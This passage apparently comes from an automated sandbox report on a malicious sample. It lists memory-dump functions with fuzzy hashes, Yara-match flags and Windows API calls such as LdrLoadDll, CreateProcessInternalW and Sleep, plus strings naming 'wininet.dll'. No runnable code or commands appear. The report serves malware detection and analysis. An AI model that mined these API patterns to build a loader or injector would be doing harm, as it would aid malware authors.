                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                        • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                        • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                        • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022CFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022CFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022CFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022CFB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                        • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                        • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                        • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022CFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022CF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022CF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022CFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022CFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022CFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022CFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022CFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00089080, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 00089128
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
                                                        • Opcode ID: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                                                        • Instruction ID: 4d3ac149512791c60a8de0cf03998bd12f1840dbb63f8b6bb02397ee00bc4fa3
                                                        • Opcode Fuzzy Hash: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                                                        • Instruction Fuzzy Hash: F33181B2504745BBC724EF64C889FABB7F8BB48B01F14811DF66A5B245D730A550CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0008A663, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00073AF8), ref: 0008A69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: .z`
                                                        • API String ID: 3298025750-1441809116
                                                        • Opcode ID: a25a38aab9ccf4578fe25bb5680fe6c856bf68d86bcab55d8a1a40021b7247f7
                                                        • Instruction ID: 4eb22c24415b8e0b7716f1c97cdf98aba2b4494a660bb411dfe448ba950ea951
                                                        • Opcode Fuzzy Hash: a25a38aab9ccf4578fe25bb5680fe6c856bf68d86bcab55d8a1a40021b7247f7
                                                        • Instruction Fuzzy Hash: 0EE06DB1201204AFDB24DF95CD88FAB7769FF84310F10855AFA085B651C630E914CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0008A670, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00073AF8), ref: 0008A69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: .z`
                                                        • API String ID: 3298025750-1441809116
                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                        • Instruction ID: b1adadced4e596734d2d0af44297bb8e8c393ebae0ceedf6b099442860b86ea7
                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                        • Instruction Fuzzy Hash: 51E012B1200208ABDB18EF99CC49EA777ACEF88750F118559BA085B242C630E9108AB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00078308, Relevance: 3.1, APIs: 2, Instructions: 60threadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0007836A
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0007838B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: ea990796e43ab271ad230c85924eab175a38249133d3b03a0b0848f29a2bb321
                                                        • Instruction ID: f4d68b8df67be90e131fa8f48f96410cf5977fba799e39696dba06598fe1fec0
                                                        • Opcode Fuzzy Hash: ea990796e43ab271ad230c85924eab175a38249133d3b03a0b0848f29a2bb321
                                                        • Instruction Fuzzy Hash: AB01D831A802297BE721A6949C47FFE776CAB41F50F144114FF48BA1C2E698690647F6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00078310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0007836A
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0007838B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                        • Instruction ID: 99fc67312efd1e265522b70dd9cf0e19dfa4fb158b14fb9739e95ef2428e8a84
                                                        • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                        • Instruction Fuzzy Hash: F8018431A802287AE721A6949C47FFE776C6B41F50F054114FF08BA1C2EAA86A0547F6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0007AC6C, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 74f31a5475c3ac62470ac21ed5d7384022201c69dfbc097c16fee53b3b421591
                                                        • Instruction ID: 72549bffcb563c21ca03871f9bd67ca9771f3cbb797f397348f9c45cd69fe9ca
                                                        • Opcode Fuzzy Hash: 74f31a5475c3ac62470ac21ed5d7384022201c69dfbc097c16fee53b3b421591
                                                        • Instruction Fuzzy Hash: 49315A35E0814E6FDB21DB54D884EFCB7A4EF92318F088196EC5C8B242E5369D08C792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0007ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0007AD62
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                        • Instruction ID: 103fea0457ff06912c94920778916d868279ba7587f5b5f25d0e5b48dd3051e2
                                                        • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                        • Instruction Fuzzy Hash: 600112B5E4010DA7DF10EBA4DC42FDDB3B8AB54308F108595E90D97642F635EB148B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0008A6E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0008A734
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                        • Instruction ID: 0476b1f1081adc5770f695d19d77e3fccb12c3c89d2a1220b84b869ae91f608c
                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                        • Instruction Fuzzy Hash: A201B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0008A6DE, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0008A734
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: dc4b5a66591aad0aa907e8021c5e53538361f01262fa79cd02e07bb58aad7ac5
                                                        • Instruction ID: cc461e37212844c3347e23622562538864990def5d1c5a68a02c4542a8db76f5
                                                        • Opcode Fuzzy Hash: dc4b5a66591aad0aa907e8021c5e53538361f01262fa79cd02e07bb58aad7ac5
                                                        • Instruction Fuzzy Hash: 1001B2B2200108BFDB54DF89DD80EEB37ADAF8C754F158258FA0DA7245C630E851CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000891B0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
